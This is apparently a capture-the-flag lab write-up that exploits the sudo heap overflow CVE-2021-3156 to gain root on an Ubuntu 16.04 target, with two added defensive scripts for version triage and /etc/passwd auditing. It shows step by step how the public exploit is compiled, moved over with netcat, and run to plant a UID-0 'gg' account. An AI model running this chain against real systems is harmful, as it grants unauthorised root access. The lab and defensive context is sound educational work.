CVE-2021-3156


PEAS has discovered that the target system is vulnerable to CVE-2021-3156

A vulnerability was found in sudo up to 1.8.31p2/1.9.5p1 (operating system utility software) and has been rated critical. The issue affects the function sudoers_policy_main: manipulation with an unknown input leads to a heap-based overflow, classified as CWE-122. A heap overflow is a buffer overflow where the buffer that gets overwritten is allocated in the heap portion of memory, generally meaning it was allocated with a routine such as malloc(). Confidentiality, integrity, and availability are all impacted.
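The version ranges in the description are what a triage script checks first. The following is an added example written for this writeup, not code from the page, from PEAS, or from the exploit repository: it parses the version string that `sudo --version` prints and compares it against the affected ranges for CVE-2021-3156 (1.8.2 through 1.8.31p2 and 1.9.0 through 1.9.5p1; the upstream fixes shipped as 1.8.32 and 1.9.5p2). The sample version strings at the bottom are constructed.

```python
import re

# Affected ranges for CVE-2021-3156, as (major, minor, patch, p-level) tuples:
# legacy branch 1.8.2 .. 1.8.31p2 and stable branch 1.9.0 .. 1.9.5p1.
# Upstream fixed releases are 1.8.32 and 1.9.5p2.
VULNERABLE_RANGES = [
    ((1, 8, 2, 0), (1, 8, 31, 2)),
    ((1, 9, 0, 0), (1, 9, 5, 1)),
]

# Matches "1.8.31p2", "1.9.5", "1.8.32" inside a longer line.
_VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:p(\d+))?")


def parse_sudo_version(text):
    """Extract (major, minor, patch, plevel) from `sudo --version` output or
    a bare version string. Returns None when no version is present."""
    m = _VERSION_RE.search(text)
    if not m:
        return None
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch or 0), int(plevel or 0))


def is_vulnerable_version(version):
    """True when the tuple falls inside one of the affected ranges."""
    return any(lo <= version <= hi for lo, hi in VULNERABLE_RANGES)


def assess(sudo_version_output):
    """Return (verdict, parsed_version). verdict is 'vulnerable',
    'not-vulnerable' or 'unknown' (no parsable version)."""
    v = parse_sudo_version(sudo_version_output)
    if v is None:
        return ("unknown", None)
    return ("vulnerable" if is_vulnerable_version(v) else "not-vulnerable", v)


if __name__ == "__main__":
    # Constructed sample outputs; the first resembles what an Ubuntu 16.04 host
    # would print, the others are patched upstream releases.
    for sample in ("Sudo version 1.8.16", "Sudo version 1.9.5p2", "1.8.32"):
        print(sample, "->", assess(sample))
```

The version match is a triage hint, not proof: distributions backport the fix without changing the upstream version number (the Ubuntu package for 1.8.21p2 is one example), so confirm against the distribution's security advisory or package changelog before treating a host as vulnerable or as fixed.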

Exploit


Exploit found online

tomcat@ubuntu:/dev/shm$ gcc
gcc
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'
 
tomcat@ubuntu:/dev/shm$ cc
cc
The program 'cc' can be found in the following packages:
 * gcc
 * clang
 * tcc
Ask your administrator to install one of them

There is no compiler installed on the target system, so we opt for compiling the exploit remotely.

Docker Exploit Development


┌──(kali㉿kali)-[~/archive/thm/thompson]
└─$ docker run -it --entrypoint "/bin/bash" --name thompson ubuntu:16.04
 
root@e2c61b7c3ce1:/# ldd --version
ldd (Ubuntu GLIBC 2.23-0ubuntu11.3) 2.23
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

Firing up a Docker instance that matches the target system and glibc version

root@e2c61b7c3ce1:/# apt update -y ; apt install net-tools netcat nano gcc gcc-multilib make git wget -y ; cd root

Installing necessary packages

root@e2c61b7c3ce1:~# git clone https://github.com/worawit/CVE-2021-3156 ; cd CVE-2021-3156
Cloning into 'CVE-2021-3156'...
remote: Enumerating objects: 86, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (7/7), done.
remote: Total 86 (delta 16), reused 11 (delta 11), pack-reused 68
Unpacking objects: 100% (86/86), done.
Checking connectivity... done.
 
root@e2c61b7c3ce1:~/CVE-2021-3156# gcc -O2 -o exploit_timestamp_race exploit_timestamp_race.c -ldl
root@e2c61b7c3ce1:~/CVE-2021-3156# cd .. ; tar -czf CVE-2021-3156.tar.gz ./CVE-2021-3156

Cloning the exploit repository, compiling it, and packaging the result for transfer

root@e2c61b7c3ce1:~# nc 10.10.206.196 2222 < CVE-2021-3156.tar.gz 
 
tomcat@ubuntu:/dev/shm$ nc -nlvp 2222 >> CVE-2021-3156.tar.gz
Listening on [0.0.0.0] (family 0, port 2222)
Connection from [10.9.2.95] port 2222 [tcp/*] accepted (family 2, sport 36356)

Delivery complete

Exploitation


tomcat@ubuntu:/dev/shm$ tar -xf CVE-2021-3156.tar.gz ; cd CVE-2021-3156

Extracting the exploit package

tomcat@ubuntu:/dev/shm/CVE-2021-3156$ ./exploit_userspec.py
 
[...REDACTED...]
 
offset to first userspec: 0x370
 
cmnd size: 0x1230
offset to defaults: 0x60
offset to first userspec: 0x370
offset to userspec: 0x0
 
to skip finding offsets next time no this machine, run: 
./exploit_userspec.py 0x1230 0x60 0x370 0x0
 
 
gg:$5$a$gemgwVPxLx/tdtByhncd4joKlMRYQ3IVwdoBXPACCL2:0:0:gg:/root:/bin/bash
success at 1549

Exploitation successful
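The exploit's visible effect on the host is the new UID-0 entry it wrote to /etc/passwd, with a password hash placed directly in the password field rather than in /etc/shadow. The following is an added example for this writeup, not code from the page or from the exploit repository: it parses /etc/passwd-style content and reports entries that a defender would want flagged, namely additional UID-0 accounts, password hashes stored in the passwd file, and malformed lines. The sample passwd content is constructed; the "gg" line reuses the entry shown in the output above.

```python
# Constructed sample: a normal root entry, two ordinary accounts, and the
# rogue UID-0 entry from the exploit output above.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
tomcat:x:1001:1001::/opt/tomcat:/bin/bash
gg:$5$a$gemgwVPxLx/tdtByhncd4joKlMRYQ3IVwdoBXPACCL2:0:0:gg:/root:/bin/bash
"""

# Password-field values that mean "no hash stored here".
_NO_HASH = ("x", "*", "!", "")


def parse_passwd(text):
    """Parse passwd(5) content into a list of dicts. Lines that do not have
    seven colon-separated fields or a numeric UID are kept as malformed."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            entries.append({"line": lineno, "malformed": True, "raw": line})
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({
            "line": lineno, "malformed": False, "name": name, "pw": pw,
            "uid": int(uid), "gid": gid, "gecos": gecos, "home": home,
            "shell": shell,
        })
    return entries


def audit_passwd(text, allowed_uid0=("root",)):
    """Return a list of (line number, account name, reason) findings."""
    findings = []
    for e in parse_passwd(text):
        if e["malformed"]:
            findings.append((e["line"], e["raw"], "malformed passwd entry"))
            continue
        if e["uid"] == 0 and e["name"] not in allowed_uid0:
            findings.append((e["line"], e["name"], "additional UID-0 account"))
        if e["pw"] not in _NO_HASH:
            findings.append((e["line"], e["name"],
                             "password hash stored in /etc/passwd instead of /etc/shadow"))
    return findings


if __name__ == "__main__":
    import sys
    # Audit the real file when run with a path, otherwise the constructed sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PASSWD
    for line, who, reason in audit_passwd(text):
        print(f"line {line}: {who}: {reason}")
```

Run it as `python3 audit_passwd.py /etc/passwd` on a live host. On the sample it reports the "gg" line twice, once for the extra UID 0 and once for the inline hash. Pairing a check like this with file-integrity monitoring or an auditd watch on /etc/passwd and /etc/shadow catches this class of post-exploitation change regardless of which privilege-escalation bug was used to make it.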

tomcat@ubuntu:/dev/shm/CVE-2021-3156$ su gg
Password: gg
 
root@ubuntu:/dev/shm/CVE-2021-3156# whoami
root
root@ubuntu:/dev/shm/CVE-2021-3156# hostname
ubuntu
root@ubuntu:/dev/shm/CVE-2021-3156# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 02:a6:23:97:5f:3d brd ff:ff:ff:ff:ff:ff
    inet 10.10.118.162/16 brd 10.10.255.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::a6:23ff:fe97:5f3d/64 scope link 
       valid_lft forever preferred_lft forever

System Level Compromise